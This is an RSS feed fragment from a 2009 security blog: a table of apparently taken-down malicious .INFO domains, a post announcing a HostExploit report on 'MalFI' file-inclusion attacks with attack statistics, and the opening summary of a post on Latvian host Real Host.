<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GC9.INFO<span> </span></td>
<td>BM5.INFO<span> </span></td>
<td>EP8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD0.INFO<span> </span></td>
<td>BM8.INFO<span> </span></td>
<td>EQ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD4.INFO<span> </span></td>
<td>BN0.INFO<span> </span></td>
<td>EQ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD5.INFO<span> </span></td>
<td>BN3.INFO<span> </span></td>
<td>ER9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD6.INFO<span> </span></td>
<td>BN5.INFO<span> </span></td>
<td>ES7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD7.INFO<span> </span></td>
<td>BN7.INFO<span> </span></td>
<td>ES8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GD8.INFO<span> </span></td>
<td>BN8.INFO<span> </span></td>
<td>ES9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GF3.INFO<span> </span></td>
<td>BP0.INFO<span> </span></td>
<td>EU0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH4.INFO<span> </span></td>
<td>BP5.INFO<span> </span></td>
<td>EV9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH5.INFO<span> </span></td>
<td>BP6.INFO<span> </span></td>
<td>EW0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH6.INFO<span> </span></td>
<td>BP7.INFO<span> </span></td>
<td>EW4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GH7.INFO<span> </span></td>
<td>BP8.INFO<span> </span></td>
<td>EY0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI0.INFO<span> </span></td>
<td>BQ0.INFO<span> </span></td>
<td>EZ0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI3.INFO<span> </span></td>
<td>BQ2.INFO<span> </span></td>
<td>EZ9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI6.INFO<span> </span></td>
<td>BQ3.INFO<span> </span></td>
<td>FA0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GI8.INFO<span> </span></td>
<td>BQ4.INFO<span> </span></td>
<td>FC0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ0.INFO<span> </span></td>
<td>BQ5.INFO<span> </span></td>
<td>FC5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ7.INFO<span> </span></td>
<td>BQ6.INFO<span> </span></td>
<td>FC7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ8.INFO<span> </span></td>
<td>BQ7.INFO<span> </span></td>
<td>FC9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GJ9.INFO<span> </span></td>
<td>BQ8.INFO<span> </span></td>
<td>FD0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK0.INFO<span> </span></td>
<td>BQ9.INFO<span> </span></td>
<td>FD5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK3.INFO<span> </span></td>
<td>BR5.INFO<span> </span></td>
<td>FD8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK5.INFO<span> </span></td>
<td>BR6.INFO<span> </span></td>
<td>FD9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK6.INFO<span> </span></td>
<td>BR7.INFO<span> </span></td>
<td>FE0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GK8.INFO<span> </span></td>
<td>BR9.INFO<span> </span></td>
<td>FE4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL3.INFO<span> </span></td>
<td>BS3.INFO<span> </span></td>
<td>FE7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL4.INFO<span> </span></td>
<td>BS5.INFO<span> </span></td>
<td>FG0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GL9.INFO<span> </span></td>
<td>BT0.INFO<span> </span></td>
<td>FG3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GM8.INFO<span> </span></td>
<td>BU0.INFO<span> </span></td>
<td>FG5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GM9.INFO<span> </span></td>
<td>BU9.INFO<span> </span></td>
<td>FG8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN0.INFO<span> </span></td>
<td>BV0.INFO<span> </span></td>
<td>FH0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN5.INFO<span> </span></td>
<td>BV2.INFO<span> </span></td>
<td>FH4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN6.INFO<span> </span></td>
<td>BV5.INFO<span> </span></td>
<td>FH5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN7.INFO<span> </span></td>
<td>BV7.INFO<span> </span></td>
<td>FH6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GN9.INFO<span> </span></td>
<td>BV8.INFO<span> </span></td>
<td>FH7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">GP8.INFO<span> </span></td>
<td>BV9.INFO<span> </span></td>
<td>FH8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX2.INFO<span> </span></td>
<td>WGREATDREAM.COM<span> </span></td>
<td>FH9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX7.INFO<span> </span></td>
<td>GP0.INFO<span> </span></td>
<td>FI4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BX9.INFO<span> </span></td>
<td>GQ0.INFO<span> </span></td>
<td>FJ0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BY5.INFO<span> </span></td>
<td>GQ2.INFO<span> </span></td>
<td>FJ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">BZ9.INFO<span> </span></td>
<td>GQ3.INFO<span> </span></td>
<td>FJ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CB0.INFO<span> </span></td>
<td>GQ4.INFO<span> </span></td>
<td>FJ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CB6.INFO<span> </span></td>
<td>GQ5.INFO<span> </span></td>
<td>FJ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CE3.INFO<span> </span></td>
<td>GQ9.INFO<span> </span></td>
<td>FJ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CE7.INFO<span> </span></td>
<td>GR6.INFO<span> </span></td>
<td>FJ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF0.INFO<span> </span></td>
<td>GR9.INFO<span> </span></td>
<td>FJ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF3.INFO<span> </span></td>
<td>GS0.INFO<span> </span></td>
<td>FJ9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF4.INFO<span> </span></td>
<td>GS3.INFO<span> </span></td>
<td>FK2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF5.INFO<span> </span></td>
<td>GS6.INFO<span> </span></td>
<td>JD0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF6.INFO<span> </span></td>
<td>GS9.INFO<span> </span></td>
<td>JD6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CF7.INFO<span> </span></td>
<td>GU0.INFO<span> </span></td>
<td>JD7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CG3.INFO<span> </span></td>
<td>GU4.INFO<span> </span></td>
<td>JD9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CI0.INFO<span> </span></td>
<td>GV0.INFO<span> </span></td>
<td>JE2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CJ0.INFO<span> </span></td>
<td>GV2.INFO<span> </span></td>
<td>JE4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CJ3.INFO<span> </span></td>
<td>GV3.INFO<span> </span></td>
<td>JF0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CJ8.INFO<span> </span></td>
<td>GV4.INFO<span> </span></td>
<td>JF2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CL0.INFO<span> </span></td>
<td>GV5.INFO<span> </span></td>
<td>JF3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CL5.INFO<span> </span></td>
<td>GV9.INFO<span> </span></td>
<td>JG0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CL9.INFO<span> </span></td>
<td>GW0.INFO<span> </span></td>
<td>JG2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CM9.INFO<span> </span></td>
<td>GX0.INFO<span> </span></td>
<td>JG3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CO0.INFO<span> </span></td>
<td>GX2.INFO<span> </span></td>
<td>JG7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CP0.INFO<span> </span></td>
<td>GX4.INFO<span> </span></td>
<td>JG8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CP5.INFO<span> </span></td>
<td>GX5.INFO<span> </span></td>
<td>JG9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CP7.INFO<span> </span></td>
<td>GX6.INFO<span> </span></td>
<td>JH0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ0.INFO<span> </span></td>
<td>GY0.INFO<span> </span></td>
<td>JH4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ5.INFO<span> </span></td>
<td>GY2.INFO<span> </span></td>
<td>JH5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ7.INFO<span> </span></td>
<td>GY4.INFO<span> </span></td>
<td>JH7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ8.INFO<span> </span></td>
<td>GY5.INFO<span> </span></td>
<td>JI0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CQ9.INFO<span> </span></td>
<td>GY6.INFO<span> </span></td>
<td>JI1.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CS0.INFO<span> </span></td>
<td>GY7.INFO<span> </span></td>
<td>JI2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CS7.INFO<span> </span></td>
<td>GY9.INFO<span> </span></td>
<td>JI7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CT0.INFO<span> </span></td>
<td>HB7.INFO<span> </span></td>
<td>JI9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CT6.INFO<span> </span></td>
<td>HB8.INFO<span> </span></td>
<td>JK7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CT8.INFO<span> </span></td>
<td>HC0.INFO<span> </span></td>
<td>JK8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CU3.INFO<span> </span></td>
<td>HC4.INFO<span> </span></td>
<td>JL2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CU4.INFO<span> </span></td>
<td>HC8.INFO<span> </span></td>
<td>JL3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CU5.INFO<span> </span></td>
<td>HD0.INFO<span> </span></td>
<td>JL4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CV0.INFO<span> </span></td>
<td>HE4.INFO<span> </span></td>
<td>JL5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CV8.INFO<span> </span></td>
<td>HE5.INFO<span> </span></td>
<td>JL7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CV9.INFO<span> </span></td>
<td>HE7.INFO<span> </span></td>
<td>JL9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW0.INFO<span> </span></td>
<td>HF0.INFO<span> </span></td>
<td>JM0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW4.INFO<span> </span></td>
<td>HF6.INFO<span> </span></td>
<td>JM3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW5.INFO<span> </span></td>
<td>HF7.INFO<span> </span></td>
<td>JM6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW8.INFO<span> </span></td>
<td>HF8.INFO<span> </span></td>
<td>JM7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CW9.INFO<span> </span></td>
<td>HF9.INFO<span> </span></td>
<td>JN2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CX0.INFO<span> </span></td>
<td>HG3.INFO<span> </span></td>
<td>JN7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CX5.INFO<span> </span></td>
<td>HG4.INFO<span> </span></td>
<td>JN8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CX6.INFO<span> </span></td>
<td>HG5.INFO<span> </span></td>
<td>JN9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CY2.INFO<span> </span></td>
<td>HG6.INFO<span> </span></td>
<td>JO0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CY3.INFO<span> </span></td>
<td>HG8.INFO<span> </span></td>
<td>JQ1.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CY6.INFO<span> </span></td>
<td>HG9.INFO<span> </span></td>
<td>JQ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CY7.INFO<span> </span></td>
<td>HJ2.INFO<span> </span></td>
<td>JQ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CZ0.INFO<span> </span></td>
<td>HJ3.INFO<span> </span></td>
<td>JQ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CZ7.INFO<span> </span></td>
<td>HJ5.INFO<span> </span></td>
<td>JQ5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">CZ9.INFO<span> </span></td>
<td>HJ6.INFO<span> </span></td>
<td>JQ6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DA3.INFO<span> </span></td>
<td>HJ7.INFO<span> </span></td>
<td>JQ7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DA6.INFO<span> </span></td>
<td>HJ8.INFO<span> </span></td>
<td>JQ8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DA7.INFO<span> </span></td>
<td>HJ9.INFO<span> </span></td>
<td>JR0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DB5.INFO<span> </span></td>
<td>HK0.INFO<span> </span></td>
<td>JS3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DB6.INFO<span> </span></td>
<td>HK3.INFO<span> </span></td>
<td>JS4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DE4.INFO<span> </span></td>
<td>HK4.INFO<span> </span></td>
<td>JS5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DE5.INFO<span> </span></td>
<td>HL0.INFO<span> </span></td>
<td>JS8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DE6.INFO<span> </span></td>
<td>HL6.INFO<span> </span></td>
<td>JS9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DE8.INFO<span> </span></td>
<td>HL9.INFO<span> </span></td>
<td>JT0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DF5.INFO<span> </span></td>
<td>HM4.INFO<span> </span></td>
<td>JT3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DF6.INFO<span> </span></td>
<td>HN0.INFO<span> </span></td>
<td>JT4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DG0.INFO<span> </span></td>
<td>HN3.INFO<span> </span></td>
<td>JT5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DH3.INFO<span> </span></td>
<td>HN4.INFO<span> </span></td>
<td>JT9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DH9.INFO<span> </span></td>
<td>HN5.INFO<span> </span></td>
<td>JU0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DI0.INFO<span> </span></td>
<td>HN6.INFO<span> </span></td>
<td>JU2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DI3.INFO<span> </span></td>
<td>HN9.INFO<span> </span></td>
<td>JV0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DI4.INFO<span> </span></td>
<td>HO0.INFO<span> </span></td>
<td>JV3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DI8.INFO<span> </span></td>
<td>HP0.INFO<span> </span></td>
<td>JV4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DJ3.INFO<span> </span></td>
<td>HR6.INFO<span> </span></td>
<td>JV5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DJ7.INFO<span> </span></td>
<td>HS0.INFO<span> </span></td>
<td>JV6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DK0.INFO<span> </span></td>
<td>HS7.INFO<span> </span></td>
<td>JV8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DK5.INFO<span> </span></td>
<td>HS8.INFO<span> </span></td>
<td>JW4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DK7.INFO<span> </span></td>
<td>HS9.INFO<span> </span></td>
<td>JW7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DK8.INFO<span> </span></td>
<td>HT6.INFO<span> </span></td>
<td>JW8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DL0.INFO<span> </span></td>
<td>HU0.INFO<span> </span></td>
<td>JW9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DM0.INFO<span> </span></td>
<td>HU3.INFO<span> </span></td>
<td>JX1.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DM4.INFO<span> </span></td>
<td>HU4.INFO<span> </span></td>
<td>JX2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DP0.INFO<span> </span></td>
<td>HU6.INFO<span> </span></td>
<td>JX3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DP3.INFO<span> </span></td>
<td>HU7.INFO<span> </span></td>
<td>JX5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DP6.INFO<span> </span></td>
<td>HV0.INFO<span> </span></td>
<td>JX8.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DP7.INFO<span> </span></td>
<td>HW4.INFO<span> </span></td>
<td>JY0.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DQ0.INFO<span> </span></td>
<td>HW6.INFO<span> </span></td>
<td>JY2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DQ2.INFO<span> </span></td>
<td>HW7.INFO<span> </span></td>
<td>JY4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DR0.INFO<span> </span></td>
<td>HW8.INFO<span> </span></td>
<td>JY5.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DS7.INFO<span> </span></td>
<td>HX3.INFO<span> </span></td>
<td>JY6.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT3.INFO<span> </span></td>
<td>HX5.INFO<span> </span></td>
<td>JY7.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT5.INFO<span> </span></td>
<td>HX6.INFO<span> </span></td>
<td>JY9.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT6.INFO<span> </span></td>
<td>HX7.INFO<span> </span></td>
<td>JZ2.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT7.INFO<span> </span></td>
<td>HX9.INFO<span> </span></td>
<td>JZ3.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT8.INFO<span> </span></td>
<td>KD0.INFO<span> </span></td>
<td>JZ4.INFO<span> </span></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20">DT9.INFO<span> </span></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/12/08/major-stealthy-malware-campaign-711-domains-taken-down/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Introducing MalFI &#8211; Another Report From HostExploit</title>
		<link>http://www.martinsecurity.net/2009/11/17/introducing-malfi-another-report-from-hostexploit/</link>
		<comments>http://www.martinsecurity.net/2009/11/17/introducing-malfi-another-report-from-hostexploit/#comments</comments>
		<pubDate>Wed, 18 Nov 2009 03:33:33 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[hostexploit]]></category>
		<category><![CDATA[lfi]]></category>
		<category><![CDATA[malfi]]></category>
		<category><![CDATA[rfi]]></category>
		<category><![CDATA[xsa]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=424</guid>
		<description><![CDATA[I&#8217;m a few days late for posting this but the HostExploit team has produced another report, this time on an attack dubbed &#8220;MalFI&#8221; for malicious file inclusion. This encompasses remote file inclusion (RFI), local file inclusion (LFI) and Cross Server Attack (XSA). The report had been in the works for quite some time and while [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;m a few days late for posting this but the HostExploit team has produced another report, this time on an attack dubbed &#8220;MalFI&#8221; for malicious file inclusion. This encompasses remote file inclusion (RFI), local file inclusion (LFI) and Cross Server Attack (XSA). The report had been in the works for quite some time and while I was not a main author this time, Jart Armin and Scott Logan worked with me to interpret and use my honeypot data that I&#8217;ve been collecting over the last several months.</p>
<p>Rather than rehash the purpose for the report, here&#8217;s an excerpt from the abstract:</p>
<p><strong>MALfi “A Silent Threat”</strong></p>
<p>What is it all about, MALfi? A blended threat currently detected on around 350,000 websites &amp;<br />
Internet servers. One major purpose is to establish, “use once and throw away” disposable<br />
botnets for spam, phishing, DDoS and exploits.<br />
Full Report (public version) download PDF – <a title="hostexploit" href="http://hostexploit.com/" target="_parent">hostexploit</a> Download page = <a href="http://bit.ly/eoO4C">http://bit.ly/eoO4C</a></p>
<p><strong>Abstract / Press Release</strong></p>
<p>MALfi is a holistic and descriptive term applied to adequately describe the recent blended attack<br />
utilized by hackers and cyber criminals to compromise websites and servers. This is<br />
combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack),<br />
and RCE (remote code execution).</p>
<p>Conservative estimates over recent months indicate around 350,000 affected websites and<br />
servers worldwide. <a title="hostexploit" href="http://hostexploit.com/" target="_parent">hostexploit</a> and associated researchers have tracked 103,351 attacks,<br />
involving 2,743 unique IP addresses, with 85 countries involved in RFI scanning and 911 ASNs<br />
involved.</p>
<p>Check out the report for our research and findings. A more detailed version will also be made available to key members of the security and law enforcement communities.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/11/17/introducing-malfi-another-report-from-hostexploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Real Host, Latvia &#8211; RBN Resurgence or Clone</title>
		<link>http://www.martinsecurity.net/2009/07/31/real-host-latvia-rbn-resurgence-or-clone/</link>
		<comments>http://www.martinsecurity.net/2009/07/31/real-host-latvia-rbn-resurgence-or-clone/#comments</comments>
		<pubDate>Fri, 31 Jul 2009 16:05:01 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[banking trojan]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[moneymule]]></category>
		<category><![CDATA[ninebal]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[realhost]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[zeus]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=378</guid>
		<description><![CDATA[A couple of days ago I was investigating an attack that a reader submitted to me that was related to the recent nine ball attacks as reported by WebSense. (Part 1 &#124; Part 2) The attackers use the same techniques to exploit victims but this time have moved to new domains and updated their payloads. [...]]]></description>
